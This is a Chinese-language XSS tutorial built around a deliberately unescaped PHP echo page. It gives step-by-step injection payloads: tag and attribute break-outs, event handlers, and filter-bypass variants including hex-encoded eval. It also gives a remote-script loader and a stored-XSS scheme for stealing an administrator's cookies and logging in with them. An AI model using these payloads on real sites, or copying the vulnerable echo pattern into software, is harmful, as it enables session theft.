XSS的原理分析與解剖
0×01 前言:
《xss攻擊手法》一開始在互聯(lián)網(wǎng)上資料并不多(都是現(xiàn)成的代碼,沒有從基礎(chǔ)的開始),直到刺的《白帽子講WEB安全》和cn4rry的《XSS跨站腳本攻擊剖析與防御》才開始好轉(zhuǎn)。
我這里就不說什么xss的歷史什么東西了,xss是一門又熱門又不太受重視的Web攻擊手法,為什么會(huì)這樣呢,原因有下:
1、耗時(shí)間 2、有一定幾率不成功 3、沒有相應(yīng)的軟件來完成自動(dòng)化攻擊 4、前期需要基本的html、js功底,后期需要扎實(shí)的html、js、actionscript2/3.0等語言的功底 5、是一種被動(dòng)的攻擊手法 6、對website有http-only、crossdomian.xml沒有用
但是這些并沒有影響黑客對此漏洞的偏愛,原因不需要多,只需要一個(gè)。
Xss幾乎每個(gè)網(wǎng)站都存在,google、baidu、360等都存在。
0×02 原理:
首先我們現(xiàn)在本地搭建個(gè)PHP環(huán)境(可以使用phpstudy安裝包安裝),然后在index.php文件里寫入如下代碼:
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>XSS原理重現(xiàn)</title>
- </head>
- <body>
- <form action="" method="get">
- <input type="text" name="xss_input">
- <input type="submit">
- </form>
- <hr>
- <?php
- $xss = $_GET['xss_input'];
- echo '你輸入的字符為<br>'.$xss;
- ?>
- </body>
- </html>
然后,你會(huì)在頁面看到這樣的頁面
我們試著輸入abcd123,得到的結(jié)果為
我們在看看源代碼
我們輸入的字符串被原封不動(dòng)的輸出來了,那這里我們提出來一個(gè)假設(shè),假設(shè)我們在搜索框輸入下面的代碼會(huì)出現(xiàn)什么呢?
- <script>alert('xss')</script>
如果按照上面的例子來說,它應(yīng)該存在第12行的[br]與[/boby]>之間,變成:
- <br><script>alert('xss')</script></boby>
之后,應(yīng)該會(huì)彈出對話框。
既然假設(shè)提出來,那我們來實(shí)現(xiàn)下這個(gè)假設(shè)成不成立吧。
我們輸入
- <script>alert('xss')</script>
得到的頁面為
成功彈窗,這個(gè)時(shí)候基本上就可以確定存在xss漏洞。
我們在看看源代碼
看來,我們的假設(shè)成功了,這節(jié)就說說XSS的原理,下面幾節(jié)說說xss的構(gòu)造和利用。
#p#
0×03 xss利用輸出的環(huán)境來構(gòu)造代碼 :
上節(jié)說了xss的原理,但是我們的輸出點(diǎn)不一在[ br ]和[ /boby ]里,可以出現(xiàn)在html標(biāo)簽的屬性里,或者其他標(biāo)簽里面。所以這節(jié)很重要,因?yàn)椴灰欢?當(dāng)你輸入下面代碼就會(huì)出現(xiàn)彈窗。
- <script>alert('xss')</script>
先貼出代碼:
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>XSS利用輸出的環(huán)境來構(gòu)造代碼</title>
- </head>
- <body>
- <center>
- <h6>把我們輸入的字符串 輸出到input里的value屬性里</h6>
- <form action="" method="get">
- <h6>請輸入你想顯現(xiàn)的字符串</h6>
- <input type="text" name="xss_input_value" value="輸入"><br>
- <input type="submit">
- </form>
- <hr>
- <?php
- $xss = $_GET['xss_input_value'];
- if(isset($xss)){
- echo '<input type="text" value="'.$xss.'">';
- }else{
- echo '<input type="type" value="輸出">';
- }
- ?>
- </center>
- </body>
- </html>
下面是代碼的頁面
這段代碼的作用是把第一個(gè)輸入框的字符串,輸出到第二個(gè)輸入框,我們輸入1,那么第二個(gè)input里的value值就是1,下面是頁面的截圖和源代碼的截圖(這里我輸入下面的代碼來測試)
- <script>alert('xss')</script>
明顯的可以看到,并沒有彈出對話框,大家可能會(huì)疑惑為什么沒有彈窗呢,我們來看看源代碼
我們看到我們輸入的字符串被輸出到第15行input標(biāo)簽里的value屬性里面,被當(dāng)成value里的值來顯現(xiàn)出來,所以并沒有彈窗,這時(shí)候我們該怎么辦呢?聰明的人已經(jīng)發(fā)現(xiàn)了可以在
- <script>alert('xss')</script>
前面加個(gè)">來閉合input標(biāo)簽。所以應(yīng)該得到的結(jié)果為
成功彈窗了,我們在看看這時(shí)的頁面
看到后面有第二個(gè)input輸入框后面跟有">字符串,為什么會(huì)這樣呢,我們來看看源代碼
這時(shí)可以看到我們構(gòu)造的代碼里面有兩個(gè)">,第一個(gè)">是為了閉合input標(biāo)簽,所以第二個(gè)">就被拋棄了,因?yàn)閔tml的容錯(cuò)性高,所以并沒有像php那樣出現(xiàn)錯(cuò)誤,而是直接把多余的字符串來輸出了,有的人是個(gè)完美主義者,不喜歡有多余的字符串被輸出,這時(shí)該怎么辦呢?
這里我問大家一個(gè)問題,我之前說的xss代碼里,為什么全是帶有標(biāo)簽的。難道就不能不帶標(biāo)簽么?!答:當(dāng)然可以。既然可以不用標(biāo)簽,那我們就用標(biāo)簽里的屬性來構(gòu)造XSS,這樣的話,xss代碼又少,又不會(huì)有多余的字符串被輸出來。
還是這個(gè)環(huán)境,但是不能使用標(biāo)簽,你應(yīng)該怎么做。想想input里有什么屬性可以調(diào)用js,html學(xué)的好的人,應(yīng)該知道了,on事件,對的。我們可以用on事件來進(jìn)行彈窗,比如這個(gè)xss代碼 我們可以寫成
- " onclick="alert('xss')
這時(shí),我們在來試試,頁面會(huì)發(fā)生什么樣的變化吧。
沒有看到彈窗啊,失敗了么?答案當(dāng)然是錯(cuò)誤的,因?yàn)閛nclick是鼠標(biāo)點(diǎn)擊事件,也就是說當(dāng)你的鼠標(biāo)點(diǎn)擊第二個(gè)input輸入框的時(shí)候,就會(huì)觸發(fā)onclick事件,然后執(zhí)行alert('xss')代碼。我們來試試看
當(dāng)我點(diǎn)擊后,就出現(xiàn)了彈窗,這時(shí)我們來看看源代碼吧
第15行,value值為空,當(dāng)鼠標(biāo)點(diǎn)擊時(shí),就會(huì)彈出對話框。這里可能就會(huì)有人問了,如果要點(diǎn)擊才會(huì)觸發(fā),那不是很麻煩么,成功率不就又下降了么。我來幫你解答這個(gè)問題,on事件不止onclick這一個(gè),還有很多,如果你想不需要用戶完成什么動(dòng)作就可以觸發(fā)的話,i可以把onclick改成
Onmousemove 當(dāng)鼠標(biāo)移動(dòng)就觸發(fā)
Onload 當(dāng)頁面加載完成后觸發(fā)
還有很多,我這里就不一一說明了,有興趣的朋友可以自行查詢下。
別以為就這樣結(jié)束了,還有一類環(huán)境不能用上述的方法,
那就是如果在[ textarea ]標(biāo)簽里呢?!或者其他優(yōu)先級比script高的呢?
就下面這樣
這時(shí)我們該怎么辦呢?既然前面都說了閉合屬性和閉合標(biāo)簽了,那能不能閉合完整的標(biāo)簽?zāi)兀鸢甘强隙ǖ摹N覀兛梢暂斎胂旅娴拇a就可以實(shí)現(xiàn)彈窗了。
- </textarea><script>alert('xss')</script>
#p#
0×04 過濾的解決辦法
假如說網(wǎng)站禁止過濾了script 這時(shí)該怎么辦呢,記住一句話,這是我總結(jié)出來的“xss就是在頁面執(zhí)行你想要的js”不用管那么多,只要能運(yùn)行我們的js就OK,比如用img標(biāo)簽或者a標(biāo)簽。我們可以這樣寫
- <img scr=1 onerror=alert('xss')>當(dāng)找不到圖片名為1的文件時(shí),執(zhí)行alert('xss')
- <a href=javascrip:alert('xss')>s</a> 點(diǎn)擊s時(shí)運(yùn)行alert('xss')
- <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗
- <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執(zhí)行彈窗
等等有很多的方法,不要把思想總局限于一種上面,記住一句話“xss就是在頁面執(zhí)行你想要的js”其他的管他去。(當(dāng)然有的時(shí)候還有管他…)
0×05 xss的利用
說了那么多,大家可能都以為xss就是彈窗,其實(shí)錯(cuò)了,彈窗只是測試xss的存在性和使用性。
這時(shí)我們要插入js代碼了,怎么插呢?
你可以這樣
- <script scr="js_url"></script>
也可以這樣
- <img src=x onerror=appendChild(createElement('script')).src='js_url' />
各種姿勢,各種插,只要鞥運(yùn)行我們的js就OK。那運(yùn)行我們的js有什么用呢?
Js可以干很多的事,可以獲取cookies(對http-only沒用)、控制用戶的動(dòng)作(發(fā)帖、私信什么的)等等。
比如我們在網(wǎng)站的留言區(qū)輸入下面的代碼:
- <script scr="js_url"></script>
當(dāng)管理員進(jìn)后臺瀏覽留言的時(shí)候,就會(huì)觸發(fā),然后管理員的cookies和后臺地址還有管理員瀏覽器版本等等你都可以獲取到了,再用“桂林老兵cookie欺騙工具”來更改你的cookies,就可以不用輸入賬號 密碼 驗(yàn)證碼 就可以以管理員的方式來進(jìn)行登錄了。
至于不會(huì)js的怎么寫js代碼呢,放心網(wǎng)上有很多xss平臺,百度一下就可以看到了。頁面是傻瓜式的操作,這里就不再過多的說明了。
有興趣的朋友,下面是cn4rry給我的幾個(gè)xss平臺,大家可以自己鉆研與研究,也可以自己搭建
http://pan.baidu.com/s/1ntqOp4X
在發(fā)布此文章的時(shí)候,我特地和cn4rry談了一下,得到的結(jié)果是,我會(huì)繼續(xù)寫這個(gè)系列的。當(dāng)我把這個(gè)doc發(fā)給cn4rry的時(shí)候,他就直接來句“嗯 寫的比較基礎(chǔ)”,我本來的打算是寫一個(gè)xss入門的就可以了,我只是感覺 現(xiàn)在網(wǎng)上的文章從簡單開始介紹xss的比較少,都是在書里有
所以 我想在網(wǎng)上把他講的細(xì)點(diǎn) xss入門就可以了,后面的路 就可以自己摸索了
但是和他談過后,感覺還是要繼續(xù)寫下去,因?yàn)?ldquo;xss盲打”“xss編碼繞過”“fuzzing xss”等等,如果是自己慢慢琢磨的話,需要較長的時(shí)間,所以我打算每過一段時(shí)間就會(huì)推出下一個(gè)xss的文章,寫個(gè)系列出來。
